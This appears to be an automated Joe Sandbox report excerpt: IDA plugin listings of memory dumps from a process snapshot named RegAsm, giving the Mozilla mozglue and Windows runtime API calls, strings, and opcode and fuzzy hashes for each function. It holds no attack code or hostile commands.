                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                    • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                    • API String ID: 46770647-1733325692
                                                                                    • Opcode ID: 262a80ced137c202e2816f8c9dca25bceb0c7c5138d74f477d917a41c338933d
                                                                                    • Instruction ID: 348ce94d34513a9b772b643b543b7f72662c499d4c32a51bf0a97daa8c5578c2
                                                                                    • Opcode Fuzzy Hash: 262a80ced137c202e2816f8c9dca25bceb0c7c5138d74f477d917a41c338933d
                                                                                    • Instruction Fuzzy Hash: D3711570A0074A9FCB04DF28D5447AAFBB2FF86314F008669D8154BB41D775EA99CBE2
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,?,6C72B0A6,6C72B0A6,?,6C72AF67,?,00000010,?,6C72AF67,?,00000010,00000000,?,?,6C72AB1F), ref: 6C72B1F2
                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C72B0A6,6C72B0A6,?,6C72AF67,?,00000010,?,6C72AF67,?,00000010,00000000,?), ref: 6C72B1FF
                                                                                    • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C72B0A6,6C72B0A6,?,6C72AF67,?,00000010,?,6C72AF67,?,00000010), ref: 6C72B25F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$Xlength_error@std@@
                                                                                    • String ID: map/set<T> too long
                                                                                    • API String ID: 1922495194-1285458680
                                                                                    • Opcode ID: cbbbafd3cd44b9e198273cb174c70544af17eb8c432c107c3fafc235b6d441a7
                                                                                    • Instruction ID: 74599210327443b1cfb64ee186aca129981b482b7adf73b3ea4c541935591ace
                                                                                    • Opcode Fuzzy Hash: cbbbafd3cd44b9e198273cb174c70544af17eb8c432c107c3fafc235b6d441a7
                                                                                    • Instruction Fuzzy Hash: DD617C746042458FD701CF19CA84A9ABBF1FF4A358F28C5A9D85A4BB52C335FC45CB91
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED4F2
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED50B
                                                                                      • Part of subcall function 6C6CCFE0: EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6CCFF6
                                                                                      • Part of subcall function 6C6CCFE0: LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6CD026
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED52E
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC), ref: 6C6ED690
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED751
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                    • String ID: MOZ_CRASH()
                                                                                    • API String ID: 3805649505-2608361144
                                                                                    • Opcode ID: 8e9944c125181f07bd3cef4963bffaf755f6532d116d5d33f8ed8053c3628785
                                                                                    • Instruction ID: f8dfcdb6c0c9124f8204fede347de4e13d629b2ea549737895652aa071a92685
                                                                                    • Opcode Fuzzy Hash: 8e9944c125181f07bd3cef4963bffaf755f6532d116d5d33f8ed8053c3628785
                                                                                    • Instruction Fuzzy Hash: F251F171A097058FD324CF29C19061AB7E6EBCA318F24893FD5AAC7B84D770E804CB95
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv
                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                    • API String ID: 3732870572-2661126502
                                                                                    • Opcode ID: 7fd95820604ffee36b30800959998a0b67718223721a03d7e407b46b96572337
                                                                                    • Instruction ID: 10cbef348e72db38daac13425e274e09b2c477a1f78bb3c79c7e54034d82fb4a
                                                                                    • Opcode Fuzzy Hash: 7fd95820604ffee36b30800959998a0b67718223721a03d7e407b46b96572337
                                                                                    • Instruction Fuzzy Hash: 4C418971F087089BCB08DF78D95119EBBF6EF85358F14863EE859ABB81EB3098048745
                                                                                    APIs
                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C73985D
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C73987D
                                                                                    • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C7398DE
                                                                                    Strings
                                                                                    • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C7398D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                                    • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                    • API String ID: 1778083764-3290996778
                                                                                    • Opcode ID: 1a74ebbba58c57f8867b21f39de57aaf5ba9b986a727d699029d392f97258c37
                                                                                    • Instruction ID: 1257a504d3f9ee88bc99b7b5e19141582062289b4ef1a1825be9f2e852f0b032
                                                                                    • Opcode Fuzzy Hash: 1a74ebbba58c57f8867b21f39de57aaf5ba9b986a727d699029d392f97258c37
                                                                                    • Instruction Fuzzy Hash: D3310575B0010CAFDB14AF59D8449EF77A9DF89318F10802DEA2A9BB41CB7159098BE9
                                                                                    APIs
                                                                                    • __aulldiv.LIBCMT ref: 6C714721
                                                                                      • Part of subcall function 6C6C4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C703EBD,00000017,?,00000000,?,6C703EBD,?,?,6C6C42D2), ref: 6C6C4444
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv__stdio_common_vsprintf
                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                    • API String ID: 680628322-2661126502
                                                                                    • Opcode ID: a644ff982a21b99a27480cc9e0fdbd88a573ffb5951427bc0e4febeddf92b4b4
                                                                                    • Instruction ID: 0059e578450a9a2ce02a7ec7d1b40dea8b3309ec5099e32955ae5598cbeb2c5e
                                                                                    • Opcode Fuzzy Hash: a644ff982a21b99a27480cc9e0fdbd88a573ffb5951427bc0e4febeddf92b4b4
                                                                                    • Instruction Fuzzy Hash: 21315C71F042085BCB0CDF7DD98129EBBE6DB89328F18853EE8059BB41EB70D9048B94
                                                                                    APIs
                                                                                      • Part of subcall function 6C6C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C703EBD,6C703EBD,00000000), ref: 6C6C42A9
                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C71B127), ref: 6C71B463
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71B4C9
                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C71B4E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _getpidstrlenstrncmptolower
                                                                                    • String ID: pid:
                                                                                    • API String ID: 1720406129-3403741246
                                                                                    • Opcode ID: d9b846a789feb6194a0216b8d1d64fee9029c5651c33125ab9a41b4bd894d5b2
                                                                                    • Instruction ID: 3f921d764d99434b6f42390521a2635bef473f6d4232093c2f4e7c84d749cdfa
                                                                                    • Opcode Fuzzy Hash: d9b846a789feb6194a0216b8d1d64fee9029c5651c33125ab9a41b4bd894d5b2
                                                                                    • Instruction Fuzzy Hash: D63113B1A052088BDB00DFAAD980AAEB7B5FF45318F58452DD821A7F41D731B849CBA1
                                                                                    APIs
                                                                                    • ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C727A3F), ref: 6C6DBF11
                                                                                    • ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C727A3F), ref: 6C6DBF5D
                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C727A3F), ref: 6C6DBF7E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
                                                                                    • String ID: sl
                                                                                    • API String ID: 4279176481-3563831378
                                                                                    • Opcode ID: edf3dd4ea2f0c695aa753972fe6840c9f5fbe3678dd1ce8e2e07a8ad0f42d17c
                                                                                    • Instruction ID: 07ea320996f3b56c4a15d151559d330e2c1e70a9be3b5974483fb4ef0dc6d42a
                                                                                    • Opcode Fuzzy Hash: edf3dd4ea2f0c695aa753972fe6840c9f5fbe3678dd1ce8e2e07a8ad0f42d17c
                                                                                    • Instruction Fuzzy Hash: 7711B2792016148FC725CF1CD69996AFBF8FB5930831588ADE98A8B751C731BC00CF90
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(shell32,?,6C73D020), ref: 6C6CF122
                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6CF132
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: SHGetKnownFolderPath$shell32
                                                                                    • API String ID: 2574300362-1045111711
                                                                                    • Opcode ID: 4878ca468916bd1a12e8ea52bf4a802552f073e17f74e5113ddfdb5dfcbb4441
                                                                                    • Instruction ID: 6f645b151ac1e8c7d30511b5fb32a07a81342efeeca79006db3bc2cb16cab3b3
                                                                                    • Opcode Fuzzy Hash: 4878ca468916bd1a12e8ea52bf4a802552f073e17f74e5113ddfdb5dfcbb4441
                                                                                    • Instruction Fuzzy Hash: 73015E717012199FCB00DF6ADC48AABBBF8FF8A758B504529E849D7600D730AA04CBA5
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70E577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70E584
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70E5DE
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C70E8A6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                    • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                    • API String ID: 1483687287-53385798
                                                                                    • Opcode ID: 7cfaff276f5bb1f02bbf8f9cd792f910f7c6fb10aff9e9b85847d126eece7d46
                                                                                    • Instruction ID: 721a40f2e4d1c2abe38616b4b2c2bd23983404d9113613b35b38a68966ccf234
                                                                                    • Opcode Fuzzy Hash: 7cfaff276f5bb1f02bbf8f9cd792f910f7c6fb10aff9e9b85847d126eece7d46
                                                                                    • Instruction Fuzzy Hash: 9211A131704658DFCB00AF19C948A6ABBF4FBC932CF44863AE8A547650DB70A805CBD5
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C710CD5
                                                                                      • Part of subcall function 6C6FF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6FF9A7
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C710D40
                                                                                    • free.MOZGLUE ref: 6C710DCB
                                                                                      • Part of subcall function 6C6E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6E5EDB
                                                                                      • Part of subcall function 6C6E5E90: memset.VCRUNTIME140(ewrl,000000E5,?), ref: 6C6E5F27
                                                                                      • Part of subcall function 6C6E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6E5FB2
                                                                                    • free.MOZGLUE ref: 6C710DDD
                                                                                    • free.MOZGLUE ref: 6C710DF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                    • String ID:
                                                                                    • API String ID: 4069420150-0
                                                                                    • Opcode ID: 8471e9a401c2b464f40c202c738c439dd18d6f7e2e16428ca70b7087d588feab
                                                                                    • Instruction ID: f9f647e4669ce103dc1ba4d9b7601624968755b5cef4ecad73c480eebfa4cd3d
                                                                                    • Opcode Fuzzy Hash: 8471e9a401c2b464f40c202c738c439dd18d6f7e2e16428ca70b7087d588feab
                                                                                    • Instruction Fuzzy Hash: 8E41357191D7808BD320CF29C2817AAFBE5BFC9714F148A2EE8D887B51DB709455CB82
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C718242,?,00000000,?,6C70B63F), ref: 6C719188
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C718242,?,00000000,?,6C70B63F), ref: 6C7191BB
                                                                                    • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C718242,?,00000000,?,6C70B63F), ref: 6C7191EB
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C718242,?,00000000,?,6C70B63F), ref: 6C719200
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C718242,?,00000000,?,6C70B63F), ref: 6C719219
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: malloc$freememcpy
                                                                                    • String ID:
                                                                                    • API String ID: 4259248891-0
                                                                                    • Opcode ID: 78723270952b4e2af39980cbcd8180d9301a67d173ad0b23d17430183da6495a
                                                                                    • Instruction ID: 343a961d10ab7e93d56316d3ea92a7286003f8df3ad8a25271d4caa385bc38cd
                                                                                    • Opcode Fuzzy Hash: 78723270952b4e2af39980cbcd8180d9301a67d173ad0b23d17430183da6495a
                                                                                    • Instruction Fuzzy Hash: 3B319731A046058FEB00DF68CC4436A73E5EFA1316F188639D846CBA40FB31E94ACBA1
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC), ref: 6C700838
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C70084C
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6C7008AF
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C7008BD
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E7DC), ref: 6C7008D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$memset
                                                                                    • String ID:
                                                                                    • API String ID: 837921583-0
                                                                                    • Opcode ID: 0682fa5cbf815f143bf0eb3d10087d6b4dba3f49949bb5508c1796324c15da97
                                                                                    • Instruction ID: de45eca17b62556ca61f789c09b68c50c94dbfe465fa8ac381915ae4d19c138e
                                                                                    • Opcode Fuzzy Hash: 0682fa5cbf815f143bf0eb3d10087d6b4dba3f49949bb5508c1796324c15da97
                                                                                    • Instruction Fuzzy Hash: EB21F271B0120D8BEF04DF76D948BAEB7B9BF85728F504539D519A7A80DF31A9048BD0
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71CDA4
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                      • Part of subcall function 6C71D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C71CDBA,00100000,?,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71D158
                                                                                      • Part of subcall function 6C71D130: InitializeConditionVariable.KERNEL32(00000098,?,6C71CDBA,00100000,?,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71D177
                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71CDC4
                                                                                      • Part of subcall function 6C717480: ReleaseSRWLockExclusive.KERNEL32(?,6C7215FC,?,?,?,?,6C7215FC,?), ref: 6C7174EB
                                                                                    • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71CECC
                                                                                      • Part of subcall function 6C6DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C6DCAA2
                                                                                      • Part of subcall function 6C70CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C71CEEA,?,?,?,?,00000000,?,6C70DA31,00100000,?,?,00000000), ref: 6C70CB57
                                                                                      • Part of subcall function 6C70CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C70CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C71CEEA,?,?), ref: 6C70CBAF
                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71D058
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                    • String ID:
                                                                                    • API String ID: 861561044-0
                                                                                    • Opcode ID: 359c082373256d45a94ca7d88f8268fe211032db9b4812e96e507071ec128b4a
                                                                                    • Instruction ID: 4f8ecc921eca2729bf4f62706ba8efab6fdc0a4e8dd40e1ee6431883f1c7ac9a
                                                                                    • Opcode Fuzzy Hash: 359c082373256d45a94ca7d88f8268fe211032db9b4812e96e507071ec128b4a
                                                                                    • Instruction Fuzzy Hash: 13D18071A04B469FD708CF28C580B99F7E1BF99308F05866DD8598BB12EB31F965CB81
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6D17B2
                                                                                    • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C6D18EE
                                                                                    • free.MOZGLUE(?), ref: 6C6D1911
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6D194C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 3725304770-0
